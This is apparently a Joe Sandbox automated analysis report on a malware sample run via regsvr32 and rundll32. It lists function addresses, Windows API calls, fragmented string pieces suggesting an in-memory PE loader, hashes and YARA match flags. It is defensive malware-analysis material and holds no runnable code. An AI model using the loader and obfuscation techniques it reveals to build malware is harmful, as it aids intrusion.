Opcode ID: d72bc5d50b22d09011b632762878156ef0257bf259d16f3c3461911ef1dd3856
Instruction ID: fdd0a1380a39579c57d2b8ec00231571dfaa92ff0ad8886c186ea83bac10a540
Opcode Fuzzy Hash: d72bc5d50b22d09011b632762878156ef0257bf259d16f3c3461911ef1dd3856
Instruction Fuzzy Hash: D1E01271F19F5A53FE1A5F52AC8453463906F58B90F485438DC1F073B0DE6CA69AC314

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E575C Relevance: 6.4, APIs: 5, Instructions: 134COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8CB7E309C: Sleep.KERNEL32(?,?,00000000,00007FF8CB7E6B19,?,?,00000000,00007FF8CB7E6BC3,?,?,?,?,?,?,00000000,00007FF8CB7E2DC8), ref: 00007FF8CB7E30D2

Part of subcall function 00007FF8CB7EBDF4: _errno.LIBCMT ref: 00007FF8CB7EBE0F

free.LIBCMT ref: 00007FF8CB7E58A5
free.LIBCMT ref: 00007FF8CB7E58C1

Part of subcall function 00007FF8CB7E6550: RtlCaptureContext.KERNEL32 ref: 00007FF8CB7E658F
Part of subcall function 00007FF8CB7E6550: IsDebuggerPresent.KERNEL32 ref: 00007FF8CB7E662D
Part of subcall function 00007FF8CB7E6550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8CB7E6637
Part of subcall function 00007FF8CB7E6550: UnhandledExceptionFilter.KERNEL32 ref: 00007FF8CB7E6642
Part of subcall function 00007FF8CB7E6550: GetCurrentProcess.KERNEL32 ref: 00007FF8CB7E6658
Part of subcall function 00007FF8CB7E6550: TerminateProcess.KERNEL32 ref: 00007FF8CB7E6666

free.LIBCMT ref: 00007FF8CB7E58D6

Part of subcall function 00007FF8CB7E3024: HeapFree.KERNEL32(?,?,00000000,00007FF8CB7E2DDC,?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E303A
Part of subcall function 00007FF8CB7E3024: _errno.LIBCMT ref: 00007FF8CB7E3044
Part of subcall function 00007FF8CB7E3024: GetLastError.KERNEL32(?,?,00000000,00007FF8CB7E2DDC,?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E304C

free.LIBCMT ref: 00007FF8CB7E58F5
free.LIBCMT ref: 00007FF8CB7E5911

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: free$ExceptionFilterProcessUnhandled_errno$CaptureContextCurrentDebuggerErrorFreeHeapLastPresentSleepTerminate
String ID:
API String ID: 2294642566-0
Opcode ID: dc7ff44f8b32ef672d501b76c056c74ad4bf38a7a2c0d5bc14e1adea1997e9e3
Instruction ID: 569e0242cfbe8407b000e6276938f75441a22a590c1554d35349d04a6bc4768c
Opcode Fuzzy Hash: dc7ff44f8b32ef672d501b76c056c74ad4bf38a7a2c0d5bc14e1adea1997e9e3
Instruction Fuzzy Hash: 70516E36A04FA98BEB219F2AE80016A3395FB84BE8F594035DE4D477B5DE3CD946C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E5B84 Relevance: 6.2, APIs: 4, Instructions: 186COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF8CB7E5BB6

Part of subcall function 00007FF8CB7E5944: _getptd.LIBCMT ref: 00007FF8CB7E597E

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: _getptd
String ID:
API String ID: 3186804695-0
Opcode ID: fa6ae430652ad88a2b7c0fc47314cf8fd6a4311639ac00b8795087540084e4bb
Instruction ID: 73844881d1325e07941f5f7cf41c9802ab14c70f4c19226d2015a5b48f3e79a1
Opcode Fuzzy Hash: fa6ae430652ad88a2b7c0fc47314cf8fd6a4311639ac00b8795087540084e4bb
Instruction Fuzzy Hash: CE815B72A09B969BDB24DF26E1846AAB3A0FB44784F504135EF4D47BA4EF3CE455CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E61F0 Relevance: 6.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF8CB7E6217

Part of subcall function 00007FF8CB7E66D8: DecodePointer.KERNEL32 ref: 00007FF8CB7E66FF

_getptd.LIBCMT ref: 00007FF8CB7E623D
_lock.LIBCMT ref: 00007FF8CB7E6276
_lock.LIBCMT ref: 00007FF8CB7E6309

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: _lock$DecodePointer_errno_getptd
String ID:
API String ID: 4201827665-0
Opcode ID: 80346bd32cbc0638794b0fd1901a532c5b35ee42fd123eebcbfe5a7804c514a3
Instruction ID: 6508e63d8a97f8db5456e7d49cbbae159ecd589cabddb848b7af1bfa99d8f762
Opcode Fuzzy Hash: 80346bd32cbc0638794b0fd1901a532c5b35ee42fd123eebcbfe5a7804c514a3
Instruction Fuzzy Hash: 84511221A09BA68BEB54AF26A8517AA2391FF447C4F104039EE5E477B6DE7CE850C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7EF9E8 Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF8CB7EFA07

Part of subcall function 00007FF8CB7E66D8: DecodePointer.KERNEL32 ref: 00007FF8CB7E66FF

calloc.LIBCMT ref: 00007FF8CB7EFA65
_errno.LIBCMT ref: 00007FF8CB7EFA72
_errno.LIBCMT ref: 00007FF8CB7EFA7D

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: _errno$DecodePointercalloc
String ID:
API String ID: 1531210114-0
Opcode ID: 135c3f51b5ce2e738d355fd0c7e716948f0291e158272fe6257324d9ebc5dc22
Instruction ID: 008975413a5f38b1fbd94649a04f6c501a321cb1e91cb299ab4494e91732dd27
Opcode Fuzzy Hash: 135c3f51b5ce2e738d355fd0c7e716948f0291e158272fe6257324d9ebc5dc22
Instruction Fuzzy Hash: 16215E22A0DFA24BFF159F66A41137A6290AF557C4F488134EE4D4FBBADF3CE8118600

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E539C Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

_lock.LIBCMT ref: 00007FF8CB7E53B2
free.LIBCMT ref: 00007FF8CB7E53D7

Part of subcall function 00007FF8CB7E3024: HeapFree.KERNEL32(?,?,00000000,00007FF8CB7E2DDC,?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E303A
Part of subcall function 00007FF8CB7E3024: _errno.LIBCMT ref: 00007FF8CB7E3044
Part of subcall function 00007FF8CB7E3024: GetLastError.KERNEL32(?,?,00000000,00007FF8CB7E2DDC,?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E304C

_lock.LIBCMT ref: 00007FF8CB7E53F2
free.LIBCMT ref: 00007FF8CB7E5438

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: _lockfree$ErrorFreeHeapLast_errno
String ID:
API String ID: 3188102813-0
Opcode ID: 09c59b142491067d37077feec729aeb8b77d96716ac98985a4df9f6db3f8d771
Instruction ID: 2fbf4a69928c1edf3f91a042647af63cdcedae83b83d986be278a5afced99a00
Opcode Fuzzy Hash: 09c59b142491067d37077feec729aeb8b77d96716ac98985a4df9f6db3f8d771
Instruction Fuzzy Hash: B5118E22E0AFA68BFF559FB3C42177822909F81B88F144134DE1E062F2DE2CEC418321

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E2C94 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

FlsFree.KERNEL32(?,?,?,?,00007FF8CB7E2217), ref: 00007FF8CB7E2CA3
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8CB7E2217), ref: 00007FF8CB7E6A32
free.LIBCMT ref: 00007FF8CB7E6A3B
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8CB7E2217), ref: 00007FF8CB7E6A5B

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: CriticalDeleteSection$Freefree
String ID:
API String ID: 1250194111-0
Opcode ID: 0b4381b0394cf9d2fe44ee79bc2f59f9ea8a8cfc0730820b202f43bccc0e215f
Instruction ID: a429390a87e39c91cdf7f5c1c2ec0faa8d659d21e124f98e93319e0afd9d2cb7
Opcode Fuzzy Hash: 0b4381b0394cf9d2fe44ee79bc2f59f9ea8a8cfc0730820b202f43bccc0e215f
Instruction Fuzzy Hash: 3A112B31E09FA68BEA149F16E4441387361EF44BE0F588535DE69026B5CF2CE992C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E544C Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF8CB7E5456

Part of subcall function 00007FF8CB7E3108: Sleep.KERNEL32(?,?,0000000A,00007FF8CB7E2DA3,?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E314D

_errno.LIBCMT ref: 00007FF8CB7E5473
_lock.LIBCMT ref: 00007FF8CB7E54A6
_lock.LIBCMT ref: 00007FF8CB7E54C4

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: _lock$Sleep_errno_getptd
String ID:
API String ID: 2111406555-0
Opcode ID: 673e868a23441bf53d2040884fedd38da7dd7cebd98ae69a44e812092c6a0ba8
Instruction ID: 619558e9c239476025657c47daabd3cd1962e600b7b31c2f620e60f20606241b
Opcode Fuzzy Hash: 673e868a23441bf53d2040884fedd38da7dd7cebd98ae69a44e812092c6a0ba8
Instruction Fuzzy Hash: CB016922A09B928BF7446FA2D4127A96260EF44BC4F008034EE0D0B3B6CE2CEC508361

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7EBB50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF8CB7E2534: _getptd.LIBCMT ref: 00007FF8CB7E254A

_errno.LIBCMT ref: 00007FF8CB7EBCD8
_errno.LIBCMT ref: 00007FF8CB7EBD12

Strings

#, xrefs: 00007FF8CB7EBC70

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: _errno$_getptd
String ID: #
API String ID: 3432092939-1885708031
Opcode ID: 9b19af0c0418e3e0b258a70cd69edc5393c065aacbb8da76a6c44f52b7c881eb
Instruction ID: c4558034b4b2edaf508334450c3206c72085b418a1c1e520af6c3369d6a94ce0
Opcode Fuzzy Hash: 9b19af0c0418e3e0b258a70cd69edc5393c065aacbb8da76a6c44f52b7c881eb
Instruction Fuzzy Hash: B8518022A0CBD58AE7218F66E48027E6BA0FB85B90F584131DE9D537F9CE3DD841DB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E9BB0 Relevance: 5.1, APIs: 4, Instructions: 148COMMON

Download Yara Rule

APIs

free.LIBCMT ref: 00007FF8CB7E9C43
free.LIBCMT ref: 00007FF8CB7E9CDB
free.LIBCMT ref: 00007FF8CB7E9D76
free.LIBCMT ref: 00007FF8CB7E9D82

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: b79b3224c3083f646637f6279f6889a3266e8c7020fbd897531d60d37c45b2be
Instruction ID: 6e4171b29cddac372edcb89206c6a1c428da542f3fa51ed52471078cbc52a9ec
Opcode Fuzzy Hash: b79b3224c3083f646637f6279f6889a3266e8c7020fbd897531d60d37c45b2be
Instruction Fuzzy Hash: 49515832A09FE68BEA609E27A4401BA77A1BF85BD4F544531DE9E477B1CE3CE542D300

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 7152, Parent PID: 7112COMMON

Execution Graph

Execution Coverage:	10.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	11
Total number of Limit Nodes:	0

Executed Functions

Function 000002135E660000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000002135E660450
GetNativeSystemInfo.KERNELBASE ref: 000002135E660539
VirtualAlloc.KERNELBASE ref: 000002135E660580
VirtualProtect.KERNELBASE ref: 000002135E6609E9
RtlAddFunctionTable.KERNEL32 ref: 000002135E660A79

Strings

truc, xrefs: 000002135E660121
urce, xrefs: 000002135E66035D
temI, xrefs: 000002135E66014B
Free, xrefs: 000002135E66034D
Virt, xrefs: 000002135E6600F8
hIns, xrefs: 000002135E66011A
Virt, xrefs: 000002135E6600E0
ofRe, xrefs: 000002135E660318
Reso, xrefs: 000002135E660338
ualP, xrefs: 000002135E6600FF
eSys, xrefs: 000002135E660144
rote, xrefs: 000002135E660106
Reso, xrefs: 000002135E660355
Cach, xrefs: 000002135E66012F
lloc, xrefs: 000002135E6600F0
urce, xrefs: 000002135E6602E7
Reso, xrefs: 000002135E6602DB
tion, xrefs: 000002135E660128
Reso, xrefs: 000002135E6602FC
sour, xrefs: 000002135E66031F
urce, xrefs: 000002135E660304
ualA, xrefs: 000002135E6600E8
onTa, xrefs: 000002135E660171
ativ, xrefs: 000002135E66013D
aryA, xrefs: 000002135E6600D8
Flus, xrefs: 000002135E660113
Lock, xrefs: 000002135E660330
urce, xrefs: 000002135E660340
Slee, xrefs: 000002135E6600B7
Size, xrefs: 000002135E660311
RtlA, xrefs: 000002135E66015C
Find, xrefs: 000002135E6602D0
GetN, xrefs: 000002135E660136
Load, xrefs: 000002135E6602F4
Libr, xrefs: 000002135E6600D0
Load, xrefs: 000002135E6600C8
ncti, xrefs: 000002135E66016A
ddFu, xrefs: 000002135E660163

Memory Dump Source

Source File: 00000003.00000002.365200564.000002135E660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002135E660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2135e660000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
API String ID: 394283112-2517549848
Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
Instruction ID: 1309d197b5b5b51a57fe03bebe5d40dab4d865fe7993f9eb000c15d1fbfd58ff
Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
Instruction Fuzzy Hash: EF72F830524A489BDB69DF18C8897F9B7E2FBA8314F60463DE88AC3251DB34D641CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002C058 Relevance: 10.4, Strings: 8, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(I, xrefs: 000000018002C62C
#C, xrefs: 000000018002C55D
Z, xrefs: 000000018002C36B
-:, xrefs: 000000018002C100
Ekf, xrefs: 000000018002C0CA
l, xrefs: 000000018002C347
l, xrefs: 000000018002C1F5
<W, xrefs: 000000018002C1D0

Memory Dump Source

Source File: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #C$(I$-:$Ekf$<W$Z$l$l
API String ID: 0-464535774
Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010FF4 Relevance: 7.9, Strings: 6, Instructions: 363
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

OV4T, xrefs: 0000000180011307
/Zb, xrefs: 000000018001119F
)|x, xrefs: 000000018001168C
/v|, xrefs: 00000001800113E2
\, xrefs: 0000000180011205
lA, xrefs: 0000000180011819

Memory Dump Source

Source File: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: )|x$/Zb$/v|$OV4T$\$lA
API String ID: 0-3528011396
Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180021618 Relevance: 7.8, Strings: 6, Instructions: 266
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

&.+, xrefs: 000000018002180B
t(/, xrefs: 0000000180021ABB
.pN, xrefs: 0000000180021AE0
F>9, xrefs: 0000000180021937
)O, xrefs: 000000018002164B
, xrefs: 00000001800219DA

Memory Dump Source

Source File: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $&.+$)O$.pN$F>9$t(/
API String ID: 0-3036092626
Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000C608 Relevance: 5.6, Strings: 4, Instructions: 616
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

K', xrefs: 000000018000CAC7
sf, xrefs: 000000018000CE95
w\H, xrefs: 000000018000C959
+#;), xrefs: 000000018000CBDA

Memory Dump Source

Source File: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: +#;)$K'$sf$w\H
API String ID: 0-1051058546
Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001E3AC Relevance: 4.0, Strings: 3, Instructions: 215
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

<4P, xrefs: 000000018001E690
<w., xrefs: 000000018001E582
<8, xrefs: 000000018001E63C

Memory Dump Source

Source File: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: <4P$<8$<w.
API String ID: 0-1030867500
Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009100 Relevance: .1, Instructions: 125
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0000000180022010 Relevance: 9.0, Strings: 7, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1l7., xrefs: 00000001800220AF
]k, xrefs: 0000000180022069
M8;, xrefs: 0000000180022338
94, xrefs: 0000000180022371
"+H, xrefs: 000000018002236A
]k, xrefs: 000000018002232E
]$d, xrefs: 00000001800220D6

Memory Dump Source

Source File: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "+H$1l7.$M8;$]$d$]k$]k$94
API String ID: 0-2447245168
Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800059B8 Relevance: 7.9, Strings: 6, Instructions: 408
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

-!zt, xrefs: 0000000180005BD7
Mv`b, xrefs: 0000000180005D4E
R3T, xrefs: 0000000180005C59
t:v, xrefs: 0000000180005E76
ru, xrefs: 000000018000623C
d}9J, xrefs: 0000000180006179

Memory Dump Source

Source File: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
API String ID: 0-2100131636
Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
